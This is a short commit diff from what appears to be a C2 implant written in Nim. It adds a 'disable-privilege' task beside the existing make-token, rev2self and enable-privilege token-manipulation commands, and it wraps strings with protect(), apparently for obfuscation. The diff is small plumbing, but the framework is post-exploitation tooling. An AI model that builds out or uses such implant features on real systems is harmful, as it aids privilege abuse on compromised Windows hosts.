Implemented 'disable-privilege' command.

2025-10-18 13:05:01 +02:00
parent ba1f1943fc
commit 35bb4d8869
3 changed files with 33 additions and 13 deletions
--- a/src/modules/token.nim
+++ b/src/modules/token.nim
@@ -5,6 +5,7 @@ proc executeMakeToken(ctx: AgentCtx, task: Task): TaskResult
 proc executeRev2Self(ctx: AgentCtx, task: Task): TaskResult 
 proc executeTokenInfo(ctx: AgentCtx, task: Task): TaskResult 
 proc executeEnablePrivilege(ctx: AgentCtx, task: Task): TaskResult 
+proc executeDisablePrivilege(ctx: AgentCtx, task: Task): TaskResult 


 # Module definition
@@ -47,9 +48,19 @@ let module* = Module(
            description: protect("enable a token privilege."),
            example: protect("enable-privilege SeImpersonatePrivilege"),
            arguments: @[
-                Argument(name: protect("privilege"), description: protect("Privilege to modify."), argumentType: STRING, isRequired: true)
+                Argument(name: protect("privilege"), description: protect("Privilege to enable."), argumentType: STRING, isRequired: true)
            ],
            execute: executeEnablePrivilege
+        ),
+        Command(
+            name: protect("disable-privilege"),
+            commandType: CMD_DISABLE_PRIV,
+            description: protect("disable a token privilege."),
+            example: protect("disable-privilege SeImpersonatePrivilege"),
+            arguments: @[
+                Argument(name: protect("privilege"), description: protect("Privilege to disable."), argumentType: STRING, isRequired: true)
+            ],
+            execute: executeDisablePrivilege
        )
    ]
 )  
@@ -60,6 +71,7 @@ when not defined(agent):
    proc executeRev2Self(ctx: AgentCtx, task: Task): TaskResult = nil
    proc executeTokenInfo(ctx: AgentCtx, task: Task): TaskResult = nil
    proc executeEnablePrivilege(ctx: AgentCtx, task: Task): TaskResult = nil 
+    proc executeDisablePrivilege(ctx: AgentCtx, task: Task): TaskResult = nil

 when defined(agent):

@@ -118,11 +130,17 @@ when defined(agent):
    proc executeEnablePrivilege(ctx: AgentCtx, task: Task): TaskResult = 
        try: 
            echo fmt"   [>] Enabling token privilege."
-
-            let privilege = Bytes.toString(task.args[0].data)
-            let privilegeName = enablePrivilege(privilege) 
-
-            return createTaskResult(task, STATUS_COMPLETED, RESULT_STRING, string.toBytes(fmt"Enabled {privilegeName}."))
+            let privilege = Bytes.toString(task.args[0].data)            
+            return createTaskResult(task, STATUS_COMPLETED, RESULT_STRING, string.toBytes(enablePrivilege(privilege)))
+
+        except CatchableError as err: 
+            return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))
+
+    proc executeDisablePrivilege(ctx: AgentCtx, task: Task): TaskResult = 
+        try: 
+            echo fmt"   [>] Disabling token privilege."
+            let privilege = Bytes.toString(task.args[0].data)            
+            return createTaskResult(task, STATUS_COMPLETED, RESULT_STRING, string.toBytes(enablePrivilege(privilege, false)))

        except CatchableError as err: 
            return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))